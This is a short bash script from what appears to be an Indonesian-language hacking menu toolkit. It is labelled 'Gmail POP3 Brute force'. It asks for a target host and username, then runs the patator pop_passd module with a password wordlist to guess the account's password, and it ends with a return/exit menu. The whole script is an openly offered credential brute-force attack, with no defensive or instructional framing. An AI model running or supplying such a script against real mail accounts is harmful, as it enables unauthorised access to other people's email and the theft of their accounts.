#!/bin/bash

clear
echo "\n\033[32;1m          ..::|[ Gmail POP3 Brute force ]|::..\033[0m"
echo "










"
echo -n "\n\033[31;1mMasukan Host Atau IP : "
read host
echo -n "\nMasukan UserName : \033[0m"
read user

echo "



"
cd ../xx/
python2 patator pop_passd host=$host user=$user password=FILE0 0=../wodlis/passwords.lst -x ignore:code=500
echo " "

echo "
=> Tekan \033[33mB\033[0m untuk kembali
=> Tekan \033[31mK\033[0m untuk keluar"
echo -n "=> Pilihan: "
read upil
if [ $upil = b ] || [ $upil = B ]
then
clear
sh start
fi

if [ $upil = k ] || [ $upil = K ]
then
clear
sh exit
fi

